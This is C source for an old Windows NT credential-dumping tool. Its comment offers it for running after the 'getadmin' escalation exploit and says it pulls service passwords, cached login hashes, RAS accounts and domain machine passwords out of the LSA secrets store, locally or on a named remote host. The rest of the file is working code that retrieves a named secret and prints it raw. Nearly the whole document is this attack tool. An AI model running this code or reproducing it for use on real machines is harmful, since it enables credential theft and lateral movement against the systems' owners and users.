/*
* Must be run as administrator. Might be a good thing to play with after
* running getadmin ;-0 -- also note this works on raw 4.0 with no SPs.
*
* Run as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data
* or any other registry key under NTLM\security\policy\secrets.
* You should be able to get service passwords, cached password hashes
* of the last users to login, RAS accounts and passwords, workstation
* passwords for domain access, etc.
*/
#include <
windows.h>
#include <
stdio.h>
#include "ntsecapi.h"
#define AST(x) if (!(x)) {printf("Failed line %d\n", __LINE__);exit(1);} else
void write();
PLSA_UNICODE_STRING
str(LPWSTR x)
{
static LSA_UNICODE_STRING s;
s.Buffer=x;
s.Length=wcslen(x)*sizeof(WCHAR);
s.MaximumLength = (wcslen(x)+1)*2;
return &s;
}
int _cdecl
main(int argc, char *argv[])
{
LSA_HANDLE pol;
PLSA_UNICODE_STRING foo;
LSA_OBJECT_ATTRIBUTES attrs;
WCHAR keyname[256]=L"";
WCHAR host[256]=L"";
wsprintfW(keyname, L"%hS", argv[1]);
if(argc == 3) wsprintfW(host, L"%hS", argv[2]);
memset(&attrs, 0, sizeof(attrs));
AST(!LsaOpenPolicy(str(host), &attrs, 0, &pol));
AST(!LsaRetrievePrivateData(pol, str(keyname), &foo));
write(1, foo->
Buffer, foo->
Length);
LsaClose(pol);
exit(0);
}